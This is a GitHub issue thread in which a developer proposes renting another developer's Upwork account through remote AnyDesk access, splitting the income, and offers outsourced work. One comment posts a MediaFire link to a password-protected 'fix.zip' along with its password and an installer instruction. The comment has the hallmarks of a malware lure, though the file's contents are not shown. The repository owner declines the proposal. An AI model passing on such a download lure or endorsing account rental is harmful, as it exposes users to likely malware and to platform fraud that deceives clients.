### ISSUE TITLE
I want to work with you. (Long-term partner)

### ISSUE THREAD

**Issue by pioneer0102** [Diamon0/RNS-Babel#1]
Hello, Sebastian Q.
I noticed your profile on Upwork and Github. I follow you on Github.
my Github: https://pioneer0102
I want to build a long-term partnership with you.
I am a web/mobile developer based in Asia, and I am very interested in building a long-term partnership with a US developer like you. I'd like to suggest some compelling ideas that I hope you will read to the end. I understand that the following idea might seem unusual, but I want to share my honest thoughts with you.

**1. Upwork Collaboration:**
You could lend me your Upwork account, and I will handle most of the work, from bidding to project completion.
I can grow your account at the fastest speed - "100% job success" & "Rising Talent" in 1-2 months. Then it's easy for us to catch big budget projects. We can share the Upwork income (net profit) by splitting it based on a percentage (20/80-30/70). You can save the time you'd spend on Upwork and use it for other activities, potentially even earning additional income. This way, you can earn additional income while maintaining your current work style.

Here’s what you would need to do for our cooperation:
- Prepare an extra remote PC (not your personal PC, for the safety of your privacy) so that I can access it via AnyDesk. You should set up only Upwork on this pc because of your privacy. You can easily monitor and supervise all my activities and block me anytime on AnyDesk.
- If you can handle interviews with clients, it would be great.

**2. Outsource Your Development to Me:**
If you're not interested in sharing an Upwork account, you can outsource your development to me. I provide high-quality deliverables at a competitive rate. If you have multiple projects, you can outsource some of your development work to me. This way, you can handle multiple projects simultaneously and increase your overall income.

I understand that this idea might seem unusual, but I hope you can understand my perspective and I look forward to your positive response. If you are interested, we can arrange a video meeting to discuss more details and next steps.

**About me:**
I am a web/mobile developer with extensive experience in building and supporting web/mobile applications.
Skills:
  PHP, Laravel
  React, Nextjs, Vuejs, Svelte
  TailwindCSS, Bootstrap, MUI
  Nodejs, Django
  MySQL, PostgreSQL, MongoDB, GraphQL
  Flutter, ReactNative
  Figma experience
Portfolio: https://myhistory-me.vercel.app

Contact info:
work email: phxstec@gmail.com
If you're interested in me, please contact me by phxstec@gmail.com

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pioneer0102** [comment]
What is this file?
May I know where you're based in?

**Comment by Diamon0** [comment]
Sorry, but I currently don't have the interest or resources for said proposal
